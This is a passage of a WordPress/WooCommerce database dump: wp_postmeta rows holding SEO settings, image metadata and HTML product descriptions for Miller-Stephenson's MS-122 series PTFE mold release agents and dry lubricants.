INSERT INTO `wp_postmeta` VALUES (24441, 2763, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (24442, 2763, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24443, 2763, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24444, 2763, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24445, 2763, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24446, 2763, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24447, 2763, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24448, 2763, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (24449, 2763, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24450, 2763, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24451, 2763, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24452, 2763, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (24453, 2763, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24454, 2763, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24455, 2763, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (24456, 2763, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24457, 2763, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (24458, 2763, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (24459, 2763, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (24460, 2763, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (24461, 2763, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (24462, 2763, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24463, 2763, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24464, 2763, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24465, 2763, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (24466, 2763, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (24467, 2763, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24468, 2763, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (24469, 2763, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24470, 2763, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24471, 2763, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (24472, 2763, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24473, 2763, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24474, 2763, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (24475, 2763, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24476, 2763, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24477, 2763, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (24478, 2763, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (24479, 2763, '_ywtm_content_tab_description', '<h1><strong>MS-122ADL Low Global Warming Release Agent / Dry Lubricant</strong></h1>\r\nMS-122ADL was developed as an efficient, economical and universal low global warming release agent. This formulation contains a high lubricity, low molecular weight PTFE fluoropolymer specialized for mold release and dry lubricant applications. A nonflammable, non-ozone depleting carrier solvent / propellant mixture ensures all environmental regulations are met. MS-122ADL offers the following benefits:\r\n<ul>\r\n 	<li>Cost-effective release of molded parts</li>\r\n 	<li>Outstanding lubricity and minimization of slip-stick</li>\r\n 	<li>Nonflammable, Non-ozone depleting formulation</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n</ul>\r\n<h4><strong>Release Agent Applications</strong></h4>\r\nMS-122ADL can be used to release the following materials with virtually no transfer of the release agent:\r\n<ul>\r\n 	<li>Plastics</li>\r\n 	<li>Rubbers</li>\r\n 	<li>Resins</li>\r\n 	<li>Phenolics</li>\r\n 	<li>Acrylics</li>\r\n 	<li>Polycarbonates</li>\r\n 	<li>Urethanes</li>\r\n 	<li>Polystyrene</li>\r\n 	<li>Nylons</li>\r\n 	<li>Elastomers</li>\r\n</ul>\r\n<h4><strong>Dry Lubricant Applications</strong></h4>\r\nAs a dry lubricant, MS-122ADL is applicable on a variety of materials and will afford unmatched lubricity and wear resistance. These materials include:\r\n<ul>\r\n 	<li>Metal</li>\r\n 	<li>Ceramics</li>\r\n 	<li>Glass</li>\r\n 	<li>Elastomers</li>\r\n 	<li>Rubber</li>\r\n 	<li>Polycarbonates</li>\r\n 	<li>Wood</li>\r\n 	<li>Elastomers</li>\r\n</ul>\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Physical Properties</strong></td>\r\n<td width="206"></td>\r\n</tr>\r\n<tr>\r\n<td>Primary Polymer</td>\r\n<td style="text-align: center;">Fluoropolymer</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">White Particle suspension</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td style="text-align: center;">Slight</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">1.20 g/mL @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone depletion</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>VOC</td>\r\n<td style="text-align: center;">84 g / L\r\n\r\n&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4><strong>Recommended Application Procedure:</strong></h4>\r\n<ol>\r\n 	<li>Clean mold surface thoroughly. Mechanical cleaning followed by chemical cleaning, provides the best surface for application of 122ADL. Removal of all previous mold release agent is critical.</li>\r\n 	<li>Shake can vigorously for one minute. Hold can approximately 6-8 inches away from a nonheated mold surface, and apply a light coat of release agent.</li>\r\n 	<li>Allow solvent to dry completely before molding any parts. This will ensure the most effective coating for durability and cycle life.</li>\r\n</ol>\r\n<h4><strong>Reapplication:</strong></h4>\r\n<ol>\r\n 	<li>When release becomes hesitant, reapply one coat of MS-122ADL in the same manner as described above.</li>\r\n</ol>\r\n<h4><strong>Fused Coatings Procedure</strong></h4>\r\n<ol>\r\n 	<li>After applying the release agent, heat the surface to 581ºF - 600ºF. Coating will transition from white to translucent. Maintain for 10 minutes.</li>\r\n 	<li>If a white residue is left on the metal surface, buff with a soft cloth.</li>\r\n</ol>\r\n<h4><strong>MS-122 Product Line:</strong></h4>\r\nMiller-Stephenson offers a selection of specialized formulations which provide high performance solutions for your molding process. The MS-122 Series will deliver higher productivity, lower rejection rates, and higher\r\nquality products. Please use the selection guide below to help direct you to the appropriate product.\r\n\r\n<img class="alignnone size-full wp-image-2764" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/adl-comparison.png" alt="adl-comparison" width="556" height="265" />'); 
INSERT INTO `wp_postmeta` VALUES (24480, 2763, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (24481, 2763, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (24482, 2763, '_yoast_wpseo_primary_product_cat', '16'); 
INSERT INTO `wp_postmeta` VALUES (24483, 2763, '_yoast_wpseo_focuskw_text_input', 'dry lubricant'); 
INSERT INTO `wp_postmeta` VALUES (24484, 2763, '_yoast_wpseo_focuskw', 'Low Global Warming Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (24485, 2763, '_yoast_wpseo_title', 'MS-122ADL PTFE Low Global Warming Release Agent / Dry Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (24486, 2763, '_yoast_wpseo_metadesc', 'MS-122ADL was developed as an efficient, economical and universal PTFE low global warming release agent / dry lubricant. Nonflammable.'); 
INSERT INTO `wp_postmeta` VALUES (24487, 2763, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (24488, 2763, '_yoast_wpseo_focuskeywords', '[{"keyword":"dry lubricant","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (24489, 2766, '_wp_attached_file', '2016/10/LGW2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (24490, 2766, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:100;s:6:"height";i:79;s:4:"file";s:16:"2016/10/LGW2.jpg";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (24491, 2763, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (24492, 2768, '_wp_attached_file', '2016/10/shutterstock_318864752.jpg'); 
INSERT INTO `wp_postmeta` VALUES (24493, 2768, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5872;s:6:"height";i:3712;s:4:"file";s:34:"2016/10/shutterstock_318864752.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_318864752-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_318864752-800x506.jpg";s:5:"width";i:800;s:6:"height";i:506;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_318864752-768x485.jpg";s:5:"width";i:768;s:6:"height";i:485;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_318864752-1600x1011.jpg";s:5:"width";i:1600;s:6:"height";i:1011;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_318864752-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_318864752-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_318864752-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_318864752-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (24494, 2763, '_thumbnail_id', '2768'); 
INSERT INTO `wp_postmeta` VALUES (24495, 2769, '_edit_lock', '1495803648:3'); 
INSERT INTO `wp_postmeta` VALUES (24496, 2769, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (24497, 2770, '_wp_attached_file', '2016/10/shutterstock_161916098.jpg'); 
INSERT INTO `wp_postmeta` VALUES (24498, 2770, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6016;s:6:"height";i:4016;s:4:"file";s:34:"2016/10/shutterstock_161916098.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_161916098-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_161916098-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_161916098-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_161916098-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_161916098-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_161916098-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_161916098-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_161916098-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (24499, 2769, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (24500, 2769, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (24501, 2769, '_thumbnail_id', '2784'); 
INSERT INTO `wp_postmeta` VALUES (24502, 2769, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24503, 2769, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24504, 2769, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24505, 2769, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24506, 2769, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24507, 2769, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24508, 2769, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (24509, 2769, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24510, 2769, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24511, 2769, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24512, 2769, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (24513, 2769, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24514, 2769, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24515, 2769, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (24516, 2769, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24517, 2769, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (24518, 2769, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (24519, 2769, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (24520, 2769, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (24521, 2769, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (24522, 2769, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24523, 2769, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24524, 2769, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24525, 2769, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (24526, 2769, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (24527, 2769, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24528, 2769, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (24529, 2769, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24530, 2769, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24531, 2769, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (24532, 2769, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24533, 2769, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24534, 2769, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (24535, 2769, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24536, 2769, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24537, 2769, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (24538, 2769, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (24539, 2769, '_ywtm_content_tab_description', '<h1><strong>MS-122AVL High Performance Low Global Warming Mold Release Agent</strong></h1>\r\nMS-122AVL combines high efficiency low-molecular weight polytetrafluoroethylene (PTFE) and proprietary surface activation chemistry. This formulation yields superior adhesion of PTFE to metallic, glass, and nonplastic surfaces. The result is unmatched durability, extended reapplication intervals and virtually no transfer. MS-122AVL low global warming mold release agent advantages include:\r\n<ul>\r\n 	<li>Unparalleled release agent durability</li>\r\n 	<li>Ideal for difficult mold geometries</li>\r\n 	<li>Improves quality and consistency of molded parts</li>\r\n 	<li>Nonflammable; Non-ozone depleting formulation</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n</ul>\r\n<h4><strong>Release Agent Applications:</strong></h4>\r\n<h4>Our specialized chemistry can be used to release the following materials:</h4>\r\n<ul>\r\n 	<li>Plastics</li>\r\n 	<li>Rubbers</li>\r\n 	<li>Resins</li>\r\n 	<li>Phenolics</li>\r\n 	<li>Acrylics</li>\r\n 	<li>Polycarbonates</li>\r\n 	<li>Urethanes</li>\r\n 	<li>Polystyrene</li>\r\n 	<li>Nylons</li>\r\n 	<li>Elastomers</li>\r\n</ul>\r\n<h4><strong>Recommended Application Procedure:</strong></h4>\r\n<ol>\r\n 	<li>Clean mold surface thoroughly. Mechanical cleaning such as bead media blasting or steel wool, followed by chemical cleaning, provides the best surface for application of 122AVL. Removal of all previous mold release agent is critical.</li>\r\n 	<li>Shake can vigorously for one minute. Hold can approximately 6-8 inches away from a nonheated mold surface, and apply a light coat of release agent. NOTE: Material will apply wet and transparent, but will dry to a fine-white coat.</li>\r\n 	<li>Allow solvent to dry completely before molding any parts. Although it is not necessary to heat MS-122AVL, performance can be enhanced if a heating cycle is completed prior to operation. This will ensure the most effective coating for durability and cycle life.</li>\r\n</ol>\r\n<h4><strong>Reapplication:</strong></h4>\r\n<ol>\r\n 	<li>When release becomes hesitant, reapply one coat of MS-122AVL in the same manner as described previously.</li>\r\n</ol>\r\n<strong>Fused Coatings Procedure</strong>\r\n<ol>\r\n 	<li>After applying the release agent, heat the surface to 581ºF - 600ºF.</li>\r\n 	<li>Coating transition from white to translucent will occur. Maintain the temperature of the coated surface for 5 to 10 minutes.</li>\r\n 	<li>If a white residue is left on the metal surface, buff with a soft cloth. When the coating is properly fused, it is extremely durable.</li>\r\n</ol>\r\n<strong>Physical Properties:</strong>\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Primary Polymer</td>\r\n<td style="text-align: center;" width="206">Fluoropolymer</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">Light Yellow particle suspension</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td style="text-align: center;">Alcohol</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">1.2 g/mL @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td>GWP</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (24540, 2769, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (24541, 2769, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (24542, 2769, '_yoast_wpseo_primary_product_cat', '16'); 
INSERT INTO `wp_postmeta` VALUES (24543, 2769, '_yoast_wpseo_focuskw_text_input', 'Low Global Warming Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (24544, 2769, '_yoast_wpseo_focuskw', 'Low Global Warming Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (24545, 2769, '_yoast_wpseo_title', 'Low Global Warming Mold Release Agent | MS-122AVL |'); 
INSERT INTO `wp_postmeta` VALUES (24546, 2769, '_yoast_wpseo_metadesc', 'MS-122AVL low global warming mold release agent utilizing high performance PTFE in a eco-friendly formulation. Similar to MS-122AV'); 
INSERT INTO `wp_postmeta` VALUES (24547, 2769, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (24548, 2769, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (24549, 2771, '_edit_lock', '1495803627:3'); 
INSERT INTO `wp_postmeta` VALUES (24550, 2771, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (24551, 2772, '_wp_attached_file', '2016/10/shutterstock_495450013.jpg'); 
INSERT INTO `wp_postmeta` VALUES (24552, 2772, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4272;s:6:"height";i:2848;s:4:"file";s:34:"2016/10/shutterstock_495450013.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_495450013-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_495450013-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_495450013-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_495450013-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_495450013-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_495450013-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_495450013-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_495450013-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (24553, 2771, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (24554, 2771, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (24555, 2771, '_thumbnail_id', '2772'); 
INSERT INTO `wp_postmeta` VALUES (24556, 2771, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24557, 2771, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24558, 2771, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24559, 2771, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24560, 2771, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24561, 2771, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24562, 2771, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (24563, 2771, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24564, 2771, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24565, 2771, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24566, 2771, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (24567, 2771, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24568, 2771, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24569, 2771, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (24570, 2771, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24571, 2771, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (24572, 2771, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (24573, 2771, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (24574, 2771, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (24575, 2771, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (24576, 2771, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24577, 2771, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24578, 2771, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24579, 2771, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (24580, 2771, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (24581, 2771, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24582, 2771, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (24583, 2771, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24584, 2771, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24585, 2771, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (24586, 2771, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24587, 2771, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24588, 2771, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (24589, 2771, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24590, 2771, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24591, 2771, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (24592, 2771, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (24593, 2771, '_ywtm_content_tab_description', '<h1><strong>MS-122SEL High Performance Mold Release Agent</strong></h1>\r\nMS-122SEL is a Low Global Warming (LGW) formulation that has high performance, high solvency mold release agent utilizing PTFE fluoropolymers (polytetrafluoroethylene) specifically designed for unsurpassed adhesion to mold surfaces and extended durability. The proprietary solvent blend ensures that proper wetting, leveling, and surface preparation occurs when applied yielding a durable, uniform thin-film. MS-122SEL offers the following benefits:\r\n<ul>\r\n 	<li>Superior adhesion to mold surfaces</li>\r\n 	<li>High Solvency/Rapid Evaporating Carrier Fluid</li>\r\n 	<li>Ideal for compression/injection molding</li>\r\n 	<li>Nonflammable; Non-ozone depleting formulation</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n</ul>\r\n<h4><strong>MS-122SEL Release Agent Applications:</strong></h4>\r\nMS-122SEL can be used to release the following materials:\r\n<ul>\r\n 	<li>Plastics</li>\r\n 	<li>Rubbers</li>\r\n 	<li>Resins</li>\r\n 	<li>Phenolics</li>\r\n 	<li>Acrylics</li>\r\n 	<li>Polycarbonates</li>\r\n 	<li>Urethanes</li>\r\n 	<li>Polystyrene</li>\r\n 	<li>Nylons</li>\r\n 	<li>Elastomers</li>\r\n</ul>\r\n<strong>Recommended Application Procedure:</strong>\r\n<ol>\r\n 	<li>Clean mold surface thoroughly. Mechanical cleaning such as, bead media blasting or steel wool, followed by chemical cleaning, provides the best surface for application of 122SEL. Removal of all previous mold release agent is critical.</li>\r\n 	<li>Shake can 